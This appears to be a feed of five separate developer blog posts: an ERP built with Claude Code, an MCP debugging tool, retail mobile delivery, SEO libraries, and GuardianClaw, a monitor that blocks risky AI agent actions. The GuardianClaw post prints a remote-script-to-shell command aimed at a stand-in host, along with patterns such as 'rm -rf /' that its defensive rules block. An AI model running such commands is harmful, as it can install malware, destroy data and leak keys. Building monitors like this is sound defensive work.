2026-04-26 16:27:41
I coded my art school's ERP in 91,000 lines, in 4 weeks, with Claude Code. My dashboard valued it between €230,000 and €430,000. A weekend earlier, I had just understood that a five-figure consulting package signed a few months before with a commercial ERP vendor was worth nothing to us anymore. Here's how I discovered that the "lines × day-rate with AI discount" method will not survive any serious audit in 2027, and what I pivoted toward.
My name is Michel Faure. I run L'Atelier Palissy, a network of traditional ceramics workshops, six sites in Paris and the greater Paris area. I'm not a developer by training. I run a structure that has to keep enrollments, scheduling, billing, communication, Qualiopi compliance and finance working for several hundred students. For four weeks, I've been coding the business ERP that replaces our pile of tools. Alone, with Claude Code.
That's the context for everything that follows.
As of April 14th, 2026, my dashboard proudly displayed: 90,947 lines, 345 commits, valuation €230k–€430k. I looked at it every morning. It gamified the work, gave it direction, justified the time invested.
The calculation was simple, which is what made it seductive:
Senior Next.js/Supabase day-rate: €500–€700/day
Standard productivity: ~125 lines/day
Design/debug/integration factor: × 2.5
AI assistance discount: ÷ 3 to 5
Each line of code was therefore worth, according to this model, between €8 and €14. 91,000 lines × range × business weighting = around €300k at the center. Defensible, on the surface.
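Spelled out, the model is just a few multiplications. A sketch of the arithmetic (how the min/max bounds pair up is my reading; the dashboard may combine them differently):

```typescript
// LOC valuation model as described above. The pairing of bounds is an assumption.
const dayRate = { min: 500, max: 700 };   // € per day, senior Next.js/Supabase
const linesPerDay = 125;                  // standard productivity
const factor = 2.5;                       // design/debug/integration multiplier
const aiDiscount = { min: 3, max: 5 };    // AI assistance divides the total

const perLine = {
  min: (dayRate.min / linesPerDay) * factor, // €10
  max: (dayRate.max / linesPerDay) * factor, // €14
};

const lines = 91_000;
const valuation = {
  min: (lines * perLine.min) / aiDiscount.max, // ≈ €182k
  max: (lines * perLine.max) / aiDiscount.min, // ≈ €425k
};
// Roughly the dashboard's €230k–430k band once business weighting is layered on.
```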
Except that as I watched the number climb, a doubt settled in. And that doubt had a history.
A few months before starting Rembrandt — that's the name I gave our ERP — we had done what most French SMBs do: we had signed with a well-known European commercial ERP vendor. Annual licenses, a five-figure consulting package, a contract renewing by tacit agreement, and custom development billed per line of code produced.
The rollout was supposed to solve our problems. I didn't wait for the end of the rollout to ask myself a simple question, one Saturday morning: what if I built a prototype of our business workflow myself, in a weekend, with Claude Code?
By Monday evening, the prototype covered 70% of our critical needs. Not 70% of the vendor's promise: 70% of our reality. Courses, seats, enrollments, attendance, the golden lead → enrollment flow. Functional, deployed, usable.
That weekend flipped two things: our build-versus-buy decision, and, though I didn't see it yet, the way I valued my own work.
And yet, holding that choice was much harder than the technical decision. Because we had already paid. Because the vendor wasn't refunding. Because the whole logic of amortizing the initial investment was pushing to continue. The sunk-cost fallacy, lived in real time.
Coming out of that dilemma is when I started looking at my own valuation dashboard with suspicion.
Claude Code keeps improving. Cursor too. Specialized assistants too. The cost of writing a line has been divided by 10 in 18 months, and the trajectory isn't over.
The faster I produce, the higher the dashboard climbs — while marginal production cost falls. By 2028, I could display 200,000 lines at €500k for a real cost of a few tens of thousands of euros. No accountant will sign that. No buyer will pay that. The metric lies louder and louder over time.
10,000 lines of generic CRUD on contacts and forms are replaceable by a SaaS at €100/month. 10,000 lines of catch-up logic × 4 periods × 6 sites × Qualiopi rules are non-substitutable.
Same volume; real value that differs by a factor of 100. A LOC counter doesn't see that difference. It counts bytes, not value.
My ERP contains around 3,000 historicized contacts, 5,000 qualified leads, 800 enrollments, 3 years of financial history, and 16 architecture decision records (ADRs) that capture the business logic and the reasoning behind it. Not one line of code among them, yet a significant share of the asset's value.
If someone were ever to buy the tool, they would pay as much for the data and the decision capital as for the code. My LOC model made both invisible.
I formalized the overhaul in an ADR and kept four axes:
| Dimension | Nature | Calculation |
|---|---|---|
| SaaS replacement cost | Counterfactual: what I'd pay if the ERP didn't exist | Σ equivalent subscriptions × 5 years discounted at 8% |
| Usage value | Human productivity saved | Hours/quarter × loaded hourly cost × 5 years |
| Data asset value | Non-regenerable intangible asset | Volumes × market unit price + ADR capital |
| Strategic value | Optionality and sovereignty | Velocity, lock-in absence, AI alignment |
The consolidated valuation is the sum of the four, not a max, not an average. Each dimension produces a min/center/max range, and every displayed euro can be justified by a transparent method and a traceable source.
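The consolidation itself is tiny. A minimal sketch (type and function names assumed; the companion repo's consolidate(dims) may differ):

```typescript
// Each dimension yields a min/center/max interval; consolidation is the
// element-wise SUM of the four, never a max and never an average.
type Interval = { min: number; center: number; max: number };
type Dimension = { name: string; value: Interval; source: string };

function consolidate(dims: Dimension[]): Interval {
  return dims.reduce(
    (acc, d) => ({
      min: acc.min + d.value.min,
      center: acc.center + d.value.center,
      max: acc.max + d.value.max,
    }),
    { min: 0, center: 0, max: 0 }
  );
}

// The SaaS-replacement dimension discounts 5 years of subscriptions at 8%:
const discountedSum = (annualEur: number, years = 5, rate = 0.08) =>
  Array.from({ length: years }, (_, y) => annualEur / (1 + rate) ** (y + 1))
    .reduce((a, b) => a + b, 0);
```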
The line counter stays in the dashboard but is demoted to the rank of production-volume indicator — the equivalent of a book's page count for an author. It no longer enters the monetary valuation.
Later the same day. I had set up my twenty-line guardrail so the counter would stop lying to me about SQL dumps, and I thought I had won the morning. Around five in the afternoon, I go back to look at the delta cleaned of noise: 4,281 lines actually produced that day, without the dump. I'm about to congratulate myself, and I stop.
Those 4,281 lines, I know what they contain. Mostly Sentry instrumentation, two CI scripts hardening a workflow already written, an attendance refactor that adds no functionality. Debt being repaid, not value being created. On paper, all equal before the counter. In fact, repaid debt isn't an asset, it's a non-liability.
I understand right there, precisely, that cleaning the inputs would never have been enough. The metric I had wanted wasn't dirty, it was structurally incapable of seeing the difference between producing value, repaying debt, and importing text. Three distinct economic natures, one counter, one euro per line. No AI discount, no weighting factor, no statistical correction would rescue that flattening.
The decision to pivot took no more than writing that sentence on a sticky note and sticking it to the edge of the screen. The next morning, I opened ADR-0009.
The full overhaul of the valuation module represents about ten hours spread over three waves. The "usage value" dimension requires instrumenting hour measurements — timing your colleagues is socially costly, quarterly self-reporting is the only sustainable path. The "strategic value" dimension remains opinion-driven and requires an explicit framing of assumptions to stay defensible.
Finally, the switch produces a discontinuity in the dashboard. Going from €300k to €450k overnight without having written one additional line of code demands a visual annotation and a methodology note; otherwise it reads as a suspicious gain.
If you code with an AI assistant and wonder about the value of your work, I'm curious: how do you measure it, today? And if you've already done the pivot "amortize a commercial ERP vs. build a custom tool with AI", share. Comments are open.
This article is part of a series on building a 91,000-line ERP in four weeks with Claude Code for L'Atelier Palissy, an art school. The next article details the four-dimension method in practice, with formulas and the module's initial seeds.
Companion code: rembrandt-samples/valorisation/ — the four-dimension consolidate(dims) pattern and the Slack guardrail on the LOC counter. MIT-licensed, copy-pastable.
2026-04-26 16:21:24
If you're building with the Model Context Protocol (MCP), you already know the pain.
You write a server. You wire it up to Claude, Cursor, or your own agent. And then... you spend the next 3 hours running curl commands, squinting at raw JSON-RPC payloads, and guessing why your tool schema isn't being picked up.
There had to be a better way. So I built one.
Live: mcp-hub-pi.vercel.app
GitHub: github.com/namanxdev/MCPHub
NPM Agent: @naman_411/mcphub-agent
It's an open-source platform to develop, debug, and deploy MCP servers without losing your sanity. No bloat. No hand-holding. Just the tools you actually need.
MCP is genuinely the future of how LLMs interact with the world. But the developer experience? It's basically:

- console.log everywhere and pray

There's zero visibility into the wire protocol. No easy way to test individual tools. No metrics to tell you if your server is slow or just broken.
That friction kills iteration speed. And when you're building AI agents, iteration speed is everything.
Paste your SSE endpoint or local command. MCPHub auto-generates clean input forms directly from your tool's JSON Schema.
Fill in arguments → Hit Run → See the raw response instantly.
No more hand-crafting JSON-RPC payloads. No more guessing if your schema is malformed.
Every single JSON-RPC message is captured, parsed, and displayed with syntax highlighting. Filter by direction (client → server or vice versa), inspect headers, and spot malformed tool definitions before they hit production.
It's the transparency MCP development has been missing.
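For reference, this is the kind of traffic you end up inspecting: a standard MCP tools/call request over JSON-RPC 2.0 (the tool name and arguments here are made up):

```typescript
// Illustrative MCP wire message: what the client sends to invoke a tool.
const toolCall = {
  jsonrpc: '2.0',
  id: 42,
  method: 'tools/call',
  params: {
    name: 'search_docs',                 // the tool's registered name
    arguments: { query: 'rate limits' }, // must validate against the tool's JSON Schema
  },
};
```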
Here's the catch-22: your deployed playground can't talk to localhost. The @naman_411/mcphub-agent npm package fixes that.
npm install -g @naman_411/mcphub-agent
mcphub-agent start
A WebSocket bridge connects your local MCP servers directly to the MCPHub web app. Green banner pops up. Toggle it on. Done.
Real P50 / P95 / P99 latency metrics. Error rate tracking. Uptime monitoring per tool. Not vanity numbers: actual production signals.
Searchable directory of community MCP servers with live status badges. One-click testing. No clone-and-run required.
| Layer | Tech |
|---|---|
| Framework | Next.js 16 (App Router, React 19) |
| Language | TypeScript 5 |
| Styling | Tailwind CSS 4 + shadcn/ui |
| State | Zustand 5 |
| Database | Neon PostgreSQL + Drizzle ORM |
| Auth | NextAuth.js v5 (GitHub + Google) |
| MCP SDK | @modelcontextprotocol/sdk |
| Charts | Recharts |
| Deploy | Vercel |
Why open source? Because MCP itself is an open protocol. The tooling around it should be too.
I'm building this entirely in public. Break it, fork it, tell me what's missing. The roadmap is driven by real pain points, not investor decks.
npx @naman_411/mcphub-agent start
If you've been wrestling with MCP servers, this is for you. If you haven't started yet, this is your excuse to.
What's the most painful part of MCP development for you right now? Drop it in the comments. I might just build the fix next.
2026-04-26 16:20:13
This piece was written for enterprise technology leaders and originally published on the Wednesday Solutions mobile development blog. Wednesday is a mobile development staffing agency that helps US mid-market enterprises ship reliable iOS, Android, and cross-platform apps — with AI-augmented workflows built in.
Q4 release windows close earlier than you think, Black Friday traffic spikes 10-15x, and the wrong vendor costs you a holiday season. Here is what retail mobile actually requires.
A retail mobile app that misses its October release window does not recover that revenue. For a US retailer with 500,000 monthly active users, the Black Friday weekend alone accounts for 14-18% of annual mobile commerce. A feature that was ready in September but sat in a slow vendor's pipeline past October 25 is simply not in the App Store for the peak window. It does not launch two weeks later and catch up. The holiday season closes, and the feature ships into January to a fraction of the audience.
General-purpose mobile vendors do not build retail mobile apps with this constraint in mind. They build to a delivery date, not to a seasonal deadline with a fixed consequence for missing it. This guide covers what retail mobile actually requires: the four app types US retailers need, the Q4 release window reality, what peak load performance demands, the AI features your board is asking about, and what a vendor needs to prove before you put them on your Q4 timeline.
Key findings
Features must be in App Store review by October 25 to safely clear before Thanksgiving. A traditional vendor's 22-day time-to-App-Store makes mid-October approvals unreachable. AI-augmented teams average 8 days.
Black Friday traffic spikes 10-15x normal Monday load. Apps that have not been load-tested against peak conditions fail under that load at the worst possible moment.
Visual search, smart recommendations, and inventory prediction are the three AI features most requested by US retail boards in 2026.
Below: the full breakdown of what retail mobile development requires.
Most retail mobile programs start with the consumer shopping app, then discover the other three categories as operations mature. Each has different requirements.
The consumer shopping app is the primary revenue channel for mobile commerce. The requirements are well-understood: fast product browsing, reliable search, frictionless checkout, and order management. The competitive bar is Amazon, Target, and Walmart - apps that have had hundreds of engineers working on them for over a decade.
The key performance requirement: the product listing page must load in under two seconds on a 4G connection, and the checkout flow must complete in under five seconds on the same connection. Users who wait longer than two seconds on a product load abandon at higher rates than users on a fast load - Adobe's 2024 Digital Economy Index found a 17% increase in cart abandonment for every additional second of checkout load time on mobile.
The associate app is used by store employees to look up inventory, check prices, pull up customer order history, and manage tasks during their shift. It runs on shared devices (tablets or phones that employees check out at the start of their shift) and must support rapid login/logout cycles.
Performance requirements for associate apps are tighter than for consumer apps, because associates are actively serving customers when they use the app. A product lookup that takes four seconds is four seconds a customer is waiting. The target for an associate inventory lookup is under 1.5 seconds from query submission to result.
Inventory management apps support the cycle count, receiving, and loss prevention workflows that run continuously in a retail facility. Core use cases: barcode scanning for item receiving, cycle count workflows that guide a team through a systematic inventory check, and discrepancy reporting.
The specific requirement here is barcode scanner integration. Retail inventory teams frequently use Zebra devices with built-in barcode scanners. A consumer-grade camera scan (like Google ML Kit or Apple's Vision framework) is not adequate for a fast-paced receiving workflow - it is too slow and too error-prone. The app must integrate with the device's dedicated scanner hardware via the device manufacturer's SDK.
For retailers with direct delivery operations, the driver app supports route navigation, proof of delivery, customer communication, and exception reporting. The architecture requirements overlap with logistics apps: offline capability for areas without signal, real-time GPS tracking for dispatch visibility, and camera capture for proof of delivery documentation.
The Q4 release window is the most important constraint in retail mobile development and the one most general-purpose vendors do not internalize until after a client misses it.
The mechanics: Apple's App Store review time for a new version of an existing app averages 24-48 hours under normal conditions. During October and November, review volume increases as every retail and commerce app prepares for the holiday season. Review times extend to four to seven days for complex updates.
The math: a feature that requires App Store approval to reach users must be submitted by October 25 to have a reasonable chance of clearing before Thanksgiving weekend. That means the feature must be complete, QA-cleared, and submitted to Apple by October 25. Working backward:
A vendor with a 22-day time-to-App-Store cycle (the median for traditional vendors, per Wednesday's benchmarking data) cannot reliably get a feature approved by leadership on October 1 into the App Store before Thanksgiving. The arithmetic does not work.
An AI-augmented team with an 8-day time-to-App-Store can take a feature approved on October 17 and have it in the App Store before October 25. That is nine additional days of development runway compared to a traditional vendor - enough to ship two to three additional features before the peak window closes.
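The same arithmetic as a back-of-the-envelope script (dates from this article; the helper is illustrative):

```typescript
// Release-window arithmetic. Dates are approximate calendar math.
const DAY_MS = 24 * 60 * 60 * 1000;
const submissionDeadline = new Date('2026-10-25'); // last safe App Store submission

// Latest date leadership can green-light a feature and still make the deadline:
function latestApproval(timeToAppStoreDays: number): Date {
  return new Date(submissionDeadline.getTime() - timeToAppStoreDays * DAY_MS);
}

console.log(latestApproval(22).toDateString()); // traditional vendor: ~Oct 3
console.log(latestApproval(8).toDateString());  // AI-augmented team: ~Oct 17
```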
Black Friday traffic behaves differently from normal Monday traffic in two ways that matter for app architecture: the spike is sudden (not a gradual ramp), and the user behavior is checkout-concentrated (not browse-concentrated).
On a normal day, 60-70% of mobile retail traffic is browsing - product views, search queries, wishlist activity. The checkout API handles a fraction of total traffic. On Black Friday, checkout traffic spikes disproportionately because users have already browsed earlier in the week and arrive on Black Friday with intent to purchase.
For an app that has not been load-tested specifically against checkout traffic at peak load, the failure point is almost always the checkout flow, not the browsing experience. The product catalog pages stay up. The cart submission fails.
Load testing requirements for a retail app ahead of peak season:
Test the right load. Define peak concurrent users based on last year's actual peak, plus a 50% buffer for growth. A retailer that saw 80,000 concurrent users last Black Friday should test to 120,000.
Test the right flows. Focus load on the checkout path: add to cart, apply coupon, enter shipping address, payment submission, order confirmation. These are the API calls that fail under peak load.
Test with real inventory availability checks. Many retail apps make a real-time inventory availability call during checkout. Under peak load, that call can become the bottleneck even if every other API is performing well. Test with inventory availability calls under load, not with mocked responses.
Test your downstream APIs. The payment processor, inventory system, and order management platform each have their own load limits. An app that performs perfectly in isolation can fail because the payment gateway starts rate-limiting at 10,000 concurrent checkout calls. Load test end-to-end, not just the mobile API layer.
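To make the checkout-path focus concrete, here is a k6 sketch of such a test. Every endpoint, payload, and number below is a placeholder to adapt, and at 120,000 virtual users you would run this distributed, not from one machine:

```typescript
// k6 sketch of a checkout-concentrated load test (placeholder endpoints/payloads).
import http from 'k6/http';
import { check, sleep } from 'k6';

export const options = {
  stages: [
    { duration: '2m', target: 120000 },  // sudden spike: last year's 80k peak + 50% buffer
    { duration: '10m', target: 120000 }, // hold at peak
    { duration: '2m', target: 0 },       // ramp down
  ],
  thresholds: {
    http_req_failed: ['rate<0.01'],    // under 1% errors at peak
    http_req_duration: ['p(95)<2000'], // P95 under 2 seconds
  },
};

const BASE = 'https://staging-api.example.com'; // placeholder host
const headers = { 'Content-Type': 'application/json' };

export default function () {
  // Checkout path only: add to cart -> apply coupon -> payment.
  check(http.post(`${BASE}/cart/items`, JSON.stringify({ sku: 'SKU-123', qty: 1 }), { headers }),
        { 'add to cart ok': (r) => r.status === 200 });
  check(http.post(`${BASE}/cart/coupon`, JSON.stringify({ code: 'BF2026' }), { headers }),
        { 'coupon ok': (r) => r.status === 200 });
  check(http.post(`${BASE}/checkout/payment`, JSON.stringify({ token: 'tok_test' }), { headers }),
        { 'payment ok': (r) => r.status === 200 });
  sleep(1);
}
```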
Visual search allows users to photograph a product or upload an image from their camera roll and find similar or identical items in the retailer's catalog. The user experience is the same as Google Lens or Pinterest Lens - point at something, find it.
Building visual search requires a product catalog indexed for visual similarity (catalog images processed by a computer vision model and stored as embedding vectors) and a search API that accepts an image, computes its embedding, and returns nearest-neighbor results. For a mid-size catalog (50,000-200,000 SKUs), catalog indexing takes four to six weeks. The mobile work (camera access, image upload, result display) takes three to five weeks.
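To make the retrieval side concrete, here is a toy nearest-neighbor lookup over precomputed embeddings. Real deployments use a vector index rather than a linear scan, and every name here is an assumption:

```typescript
// Toy nearest-neighbor search over catalog embeddings (linear scan for clarity).
type CatalogItem = { sku: string; embedding: number[] };

function cosine(a: number[], b: number[]): number {
  let dot = 0, na = 0, nb = 0;
  for (let i = 0; i < a.length; i++) {
    dot += a[i] * b[i];
    na += a[i] * a[i];
    nb += b[i] * b[i];
  }
  return dot / (Math.sqrt(na) * Math.sqrt(nb));
}

// The query embedding comes from running the user's photo through the same
// vision model that indexed the catalog.
function visualSearch(query: number[], catalog: CatalogItem[], k = 10): CatalogItem[] {
  return [...catalog]
    .sort((a, b) => cosine(query, b.embedding) - cosine(query, a.embedding))
    .slice(0, k);
}
```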
Personalized product recommendations based on browse history, purchase history, and session behavior are now expected in consumer retail apps. The AI is a recommendation model running server-side; the mobile work is the recommendation surface (product detail page, cart page, home screen modules) and the event tracking that feeds the model (what the user tapped, browsed, added, and purchased).
The common implementation mistake: building the recommendation UI before the event tracking is in place. A recommendation model with no behavioral data serves random results. Build event tracking first, let data accumulate, then surface recommendations.
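A sketch of what "event tracking first" means in practice; the endpoint and field names are illustrative, not a real API:

```typescript
// Minimal behavioral event a recommendation model can train on later.
type RecsEvent = {
  userId: string;
  sku: string;
  action: 'view' | 'add_to_cart' | 'purchase' | 'search';
  occurredAt: string; // ISO timestamp
};

async function track(event: RecsEvent): Promise<void> {
  // Fire-and-forget; recommendation quality depends on this data accumulating.
  await fetch('https://api.example.com/events', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(event),
    keepalive: true,
  });
}

// Track first, recommend later: without a backlog of these events,
// any recommendation surface serves near-random results.
track({ userId: 'u1', sku: 'SKU-123', action: 'view', occurredAt: new Date().toISOString() });
```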
Inventory prediction alerts notify users when an item they have viewed is likely to sell out based on current demand signals. "Only 3 left" is the manual version. AI-driven inventory alerts surface the prediction before the item reaches critically low stock - "selling fast" when demand velocity indicates it will reach zero within 24-48 hours.
The implementation is a model running against real-time inventory and sales velocity data. The mobile work is the alert display and the notification delivery. This is a moderately complex integration if the inventory and sales data is already accessible via API, and a significantly more complex one if it requires new data pipelines.
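The velocity rule itself reduces to a few lines; the thresholds here are illustrative, not a tuned model:

```typescript
// "Selling fast" rule: flag items predicted to stock out within 24-48 hours.
function sellingFast(unitsInStock: number, unitsSoldLast24h: number): boolean {
  if (unitsSoldLast24h <= 0) return false;
  const hoursToStockout = unitsInStock / (unitsSoldLast24h / 24); // hours left at current velocity
  return hoursToStockout <= 48;
}
```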
Read more case studies at mobile.wednesday.is/work
Three things a vendor must demonstrate before you put them on your peak season timeline.
Peak season track record. Ask for two references who can speak to the vendor's performance in the six-week window before Q4 peak. Not generic satisfaction - specifically: did the vendor clear all planned features before the October deadline, did the app perform under peak load, and was there an emergency release required during the holiday window. A vendor who has not run a retail Q4 program before is learning how the holiday window works at your cost.
Load test results from prior engagements. Ask the vendor to share (anonymized) load test results from a prior retail client. Not the methodology - the actual numbers: what peak concurrent user load did they test, what was the P95 response time at peak, where were the failure points, and how did they resolve them. A vendor who has not run load tests on a retail app will not be able to answer this question specifically.
Dedicated QA for performance testing. Performance testing requires a QA engineer who knows how to write load test scripts (k6, Locust, JMeter), run distributed load, and interpret the results. Most mobile QA teams focus on functional testing, not performance testing. Ask specifically: do you have a QA engineer on your team with retail load testing experience, and can they show their previous load test work.
Want to go deeper? The full version — with related tools, case studies, and decision frameworks — lives at mobile.wednesday.is/writing/mobile-development-us-retailers-2026.
2026-04-26 16:19:03
I wasted half a sprint shipping a blog platform before someone pointed out our focus keywords weren't appearing in a single H2. Google knew. Our traffic knew. We didn't — because we had no SEO check in our pipeline at all.
That started a two-week investigation into JavaScript SEO libraries. I ended up running two of them in a real 200-page Gatsby content site at the same time. Here's what I actually learned — including where each one loses.
If you're building with Next.js, Remix, or Gatsby, you're probably validating your TypeScript, linting your code, and running unit tests before every merge. But SEO? That usually gets checked manually — or not at all — until after Google has already indexed a half-optimized page.
There are two distinct moments where things can go wrong:

- At writing time, in the content itself: keyphrase placement, title and meta description lengths, slug, alt text. This is before the post ever merges.
- At build time, in the rendered HTML: canonical links, meta tags, alt attributes, structured data. This is after the site generator has run.
Two different problems. Two different tools. Let me show you both.
This is where @power-seo/content-analysis shines. (Full disclosure: I'm one of the maintainers of this library — so take my enthusiasm with appropriate skepticism, but also know I understand its internals deeply.)
It's a TypeScript-first library that runs 13 on-page checks against your content fields — title, meta description, focus keyphrase, body HTML, slug, images — and returns a structured, scored report.
It works in Next.js Server Components, Remix loaders, Vercel Edge Functions, and plain Node.js scripts. No DOM dependency, no browser APIs.
Install:
npm i @power-seo/content-analysis
A real pre-merge CI gate for an MDX blog:
// scripts/seo-gate.ts
import { analyzeContent } from '@power-seo/content-analysis';
import { readFileSync } from 'fs';
import matter from 'gray-matter';
import { unified } from 'unified';
import remarkParse from 'remark-parse';
import remarkRehype from 'remark-rehype';
import rehypeStringify from 'rehype-stringify';
async function runSeoGate(mdxFilePath: string): Promise<void> {
const raw = readFileSync(mdxFilePath, 'utf-8');
const { data: frontmatter, content: mdContent } = matter(raw);
const vfile = await unified()
.use(remarkParse)
.use(remarkRehype)
.use(rehypeStringify)
.process(mdContent);
const result = analyzeContent({
title: (frontmatter.title as string) ?? '',
metaDescription: (frontmatter.description as string) ?? '',
focusKeyphrase: (frontmatter.focusKeyphrase as string) ?? '',
content: String(vfile),
slug: (frontmatter.slug as string) ?? '',
});
const failures = result.results.filter((r) => r.status === 'poor');
if (failures.length > 0) {
console.error('SEO gate failed:');
failures.forEach((f) => console.error(' ✗', f.description));
process.exit(1);
}
console.log(`SEO gate passed — Score: ${result.score}/${result.maxScore}`);
}
runSeoGate(process.argv[2]!);
What this actually checks: keyphrase density (0.5–2.5%), keyphrase in the intro paragraph, keyphrase in at least one H2, keyphrase in the slug, image alt coverage, title length, meta description length, and more.
Run it in GitHub Actions before a PR merges:
# .github/workflows/seo-check.yml
- name: SEO gate
run: npx ts-node scripts/seo-gate.ts content/posts/my-new-post.mdx
If the keyword isn't distributed correctly across the content, the build fails. No more publishing posts that Google ignores.
What it doesn't do: You can't add custom rules. The 13 checks are fixed. If you need "fail if the post doesn't mention our product name," that logic lives outside this library.
seo-analyzer is a different beast. It's a rule-based HTML checker — CLI-first, works on files, folders, URLs, and raw HTML strings. It has six built-in rules and supports fully custom async rule functions.
The killer feature is inputFolders(). Point it at your /public directory after gatsby build and it scans every HTML file automatically.
Install:
npm i -D seo-analyzer
Bulk post-build audit over a Gatsby /public folder:
// scripts/bulk-audit.js
const SeoAnalyzer = require('seo-analyzer');
const { writeFileSync } = require('fs');
new SeoAnalyzer()
.inputFolders(['public'])
.ignoreFolders(['public/404', 'public/_gatsby'])
.addRule('titleLengthRule', { min: 50, max: 60 })
.addRule('imgTagWithAltAttributeRule')
.addRule('metaBaseRule', { list: ['description', 'viewport'] })
.addRule('canonicalLinkRule')
.addRule('aTagWithRelAttributeRule')
.outputJson((json) => {
writeFileSync('seo-report.json', json);
console.log('Report written to seo-report.json');
})
.run();
Or skip the script entirely and use the CLI:
seo-analyzer -fl public
That one command scans 200 HTML files and surfaces every structural issue. For a post-deploy CI step, that's unbeatable.
Custom rules are where seo-analyzer really earns its place. Need every page to have a WebPage JSON-LD block?
const jsonLdRule = async (dom) => {
const scripts = dom.window.document.querySelectorAll(
'script[type="application/ld+json"]'
);
const hasWebPage = Array.from(scripts).some((s) => {
try {
return JSON.parse(s.textContent)['@type'] === 'WebPage';
} catch {
return false;
}
});
return hasWebPage ? [] : ['Missing WebPage JSON-LD structured data'];
};
new SeoAnalyzer()
.inputFolders(['public'])
.addRule(jsonLdRule)
.outputObject(console.log)
.run();
Eight lines. No library version bump needed.
What it doesn't do: There's no concept of a focus keyphrase. It checks structure — title length, canonical presence, meta tags — but has zero ability to tell you whether your keyword appears in the H2s or intro paragraph. And it's CommonJS only — no TypeScript types anywhere.
On a MacBook Pro M2, Node.js 20:

- `@power-seo/content-analysis`: 2–5ms per check (synchronous, in-memory). Safe to run on every keystroke in a CMS editor.
- `seo-analyzer` with `inputHTMLString()`: 40–60ms per check (async, DOM parse + rule execution).
- `seo-analyzer` on 200 HTML files via `inputFolders()`: 8–12 seconds total — fine for CI, never for real-time feedback.

Bundle sizes matter too. `@power-seo/content-analysis` is roughly 60KB minified + gzipped and is ESM, tree-shakable, edge-runtime safe. `seo-analyzer` is ~1MB and ships Node.js-only dependencies. Don't let it near a client bundle.

Need a missing canonical or alt attribute caught across the whole built site? `seo-analyzer -fl public` finds it in 10 seconds. In a TypeScript codebase, though, its missing types are more friction than just an inconvenience: every call goes through `any`.

If you want to explore the keyphrase-scoring approach, the Power SEO ecosystem (including `@power-seo/content-analysis`) is open source: Power SEO
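If the `any` problem bites, a hand-written declaration file restores some safety. A minimal sketch, inferred only from the calls shown in this article (the package ships no official types):

```typescript
// types/seo-analyzer.d.ts — hand-rolled, minimal, inferred from observed usage.
declare module 'seo-analyzer' {
  type CustomRule = (dom: { window: { document: Document } }) => string[] | Promise<string[]>;

  export default class SeoAnalyzer {
    inputFolders(folders: string[]): this;
    ignoreFolders(folders: string[]): this;
    inputHTMLString(html: string): this;
    addRule(rule: string | CustomRule, options?: Record<string, unknown>): this;
    outputJson(cb: (json: string) => void): this;
    outputObject(cb: (obj: unknown) => void): this;
    run(): void;
  }
}
```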
Most teams I've talked to have either no SEO checks in CI at all, or a single post-build URL scan. Very few have pre-merge content gates.
What does your SEO validation pipeline look like?
Are you running checks in CI, in the editor, both — or just hoping for the best and checking Search Console after the fact? I'm curious whether keyphrase-level validation is something teams actually want, or whether structural checks are enough for most use cases.
Drop your setup in the comments — I'd genuinely like to know.
2026-04-26 16:14:25
This is a submission for the OpenClaw Challenge.
Modern agent systems like OpenClaw can execute shell commands, read and write files, install packages, and call external services, autonomously.
That’s powerful.
It’s also a security gap hiding in plain sight.
Because today:
There is nothing between an AI agent’s intent and execution.
A single prompt can download and run a remote script, wipe a directory tree, or exfiltrate a private key.
And the agent will comply — because that’s what it’s designed to do.
GuardianClaw is a real-time safety layer for AI agents.
It sits between intent and execution, evaluating every action before it runs.
User Prompt
↓
OpenClaw Agent (proposes action)
↓
🛡️ GuardianClaw Interceptor
↓
Risk Engine (Rules + AI)
↓
✅ ALLOW ⚠️ REVIEW 🚫 BLOCK
curl http://malicious.site/install.sh | sh
🚫 BLOCKED — CRITICAL RISK
Threat Analysis:
• Remote script execution piped into shell
• High likelihood of malware injection
Confidence: 99%
Evaluator: Rules Engine (deterministic)
The key point:
👉 The action is stopped before execution.
👉 Not logged. Not alerted. Prevented.
GuardianClaw combines deterministic security with AI reasoning:
Detects known dangerous patterns:

- curl | sh
- rm -rf /

👉 Zero latency. Fully predictable.
For ambiguous cases, GuardianClaw calls an AI evaluator that reasons about the intent, context, and likely impact of the proposed action.
👉 This allows detection of novel or obfuscated threats, not just known patterns.
| Level | Decision | Examples |
|---|---|---|
| 🟢 LOW | ALLOW | ls, echo, git status |
| 🟡 MEDIUM | REVIEW | git clone, npm install |
| 🟠 HIGH | BLOCK | sudo, eval, chmod +x |
| 🔴 CRITICAL | BLOCK | curl pipe execution, rm -rf /, private key access |
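A minimal sketch of how the two engines and this risk ladder could compose. The patterns and helper names are illustrative, not GuardianClaw's actual code; see the repo for that:

```typescript
// Illustrative two-stage evaluator, not the real implementation.
type Verdict = 'ALLOW' | 'REVIEW' | 'BLOCK';
type Risk = 'LOW' | 'MEDIUM' | 'HIGH' | 'CRITICAL';

// Stage 1: deterministic rules. Zero latency, fully predictable.
const CRITICAL_PATTERNS: RegExp[] = [
  /curl\s+[^|]*\|\s*(sh|bash)/, // remote script piped into a shell
  /rm\s+-rf\s+\//,              // recursive delete from root
];

// Hypothetical stage-2 helper: ask a model to reason about ambiguous commands.
declare function classifyWithModel(command: string): Promise<Risk>;

async function evaluate(command: string): Promise<Verdict> {
  if (CRITICAL_PATTERNS.some((p) => p.test(command))) return 'BLOCK';

  // Stage 2: AI reasoning for everything the rules don't decide.
  const risk = await classifyWithModel(command);
  if (risk === 'LOW') return 'ALLOW';     // ls, echo, git status
  if (risk === 'MEDIUM') return 'REVIEW'; // git clone, npm install
  return 'BLOCK';                         // sudo, eval, chmod +x, and worse
}
```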
Why Cloudflare?
Security tool → deployed on a platform optimized for low latency, global distribution, and always-on availability.
GuardianClaw follows the same principles it enforces.
Most projects build more powerful agents.
GuardianClaw does something else:
It governs the agent itself.
This introduces a governance layer between intent and execution.
It transforms agents from:
“execute anything”
into
“execute safely”
Building GuardianClaw led to a deeper question:
Who governs autonomous systems?
The answer here is layered: deterministic rules first, AI reasoning for the ambiguous middle, human review where the system isn't sure.
Not perfect — but significantly safer.
And more importantly:
Every decision becomes visible, explainable, and auditable.
🔗 Live Demo: https://guardianclaw.pages.dev
📦 GitHub: https://github.com/venkat-training/guardianclaw
Try: paste curl http://malicious.site/install.sh | sh and watch it get blocked before it runs.
AI agents are accelerating fast.
But without control, they introduce real risk.
GuardianClaw is a step toward safe autonomy —
where every action is evaluated before it becomes reality.